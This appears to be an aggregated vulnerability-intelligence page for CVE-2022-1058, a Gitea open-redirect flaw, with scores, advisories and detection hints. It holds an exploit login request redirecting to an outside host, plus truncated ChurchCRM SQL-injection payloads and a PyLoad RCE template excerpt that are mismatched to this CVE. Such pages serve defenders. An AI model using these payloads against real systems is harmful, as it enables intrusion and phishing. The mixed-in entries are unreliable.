CVE-2022-1058
published 2022-03-24CVE-2022-1058: Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
PriorityP353medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
53.18%
98.8th percentile
Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| code.gitea.io | gitea | >= 0 < 1.16.5 | 1.16.5 |
| gitea | gitea | < 1.16.5 | 1.16.5 |
| go-gitea | go-gitea_gitea | >= unspecified < 1.16.5 | 1.16.5 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /user/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: redirect_to=//interact.sh
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}↗
- →Exploit sends a POST to /user/login with the `redirect_to` cookie set to a protocol-relative URL (e.g. //attacker.com). A successful exploitation results in an HTTP 302 response whose Location header echoes back the attacker-controlled value. ↗
- →Detection: look for HTTP 302 responses to POST /user/login where the Location header contains a protocol-relative URL (starts with //) pointing to an external host. ↗
- →Shodan/FOFA fingerprinting for exposed Gitea instances: search for title:"Gitea" or body containing "powered by gitea version". ↗
- ·The vulnerability exists in Gitea versions prior to 1.16.5 only. Instances running 1.16.5 or later are not affected. ↗
- ·Doc 3 (CVE-2023-0297 / PyLoad) is unrelated to CVE-2022-1058 and was excluded from this analysis; its inclusion in the source set appears to be erroneous cross-referencing.
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
nvdv2.05.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Gitea Open Redirect in code.gitea.io/gitea
osv·2024-06-04
CVE-2022-1058 Gitea Open Redirect in code.gitea.io/gitea
Gitea Open Redirect in code.gitea.io/gitea
Gitea Open Redirect in code.gitea.io/gitea
GHSA
Gitea Open Redirect
ghsa·2022-03-25
CVE-2022-1058 [MEDIUM] CWE-601 Gitea Open Redirect
Gitea Open Redirect
Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
OSV
Gitea Open Redirect
osv·2022-03-25
CVE-2022-1058 [MEDIUM] Gitea Open Redirect
Gitea Open Redirect
Open Redirect on login in GitHub repository go-gitea/gitea prior to 1.16.5.
No detection rules found.
Exploit-DB
ChurchCRM 4.4.5 - SQLi
exploitdb·2022-06-14·CVSS 7.2
CVE-2022-31325 [HIGH] ChurchCRM 4.4.5 - SQLi
ChurchCRM 4.4.5 - SQLi
---
# Exploit Title: ChurchCRM 4.4.5 - SQLi
# Exploit Author: nu11secur1ty
# Date: 05.11.2022
# Vendor: https://churchcrm.io/
# Software: https://github.com/ChurchCRM/CRM
# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 F
Nuclei
Gitea <1.16.5 - Open Redirect
nuclei·CVSS 6.1
CVE-2022-1058 [MEDIUM] Gitea <1.16.5 - Open Redirect
Gitea <1.16.5 - Open Redirect
Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2022-1058
info:
name: Gitea <1.16.5 - Open Redirect
author: theamanrawat
severity: medium
description: |
Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
Nuclei
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
nuclei·CVSS 6.1
CVE-2023-0297 [MEDIUM] PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
Template:
id: CVE-2023-0297
info:
name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
author: MrHarshvardhan,DhiyaneshDk
severity: critical
description: |
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
remediation: |
Upgrade PyLoad to a version that is not affected by this vulnerability.
reference:
- https://www.exploit-db.com/exploits/51532
- https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1058
- http://packetstormsecurity.com/files/171096/pyL
No writeups or analysis indexed.
2022-03-24
Published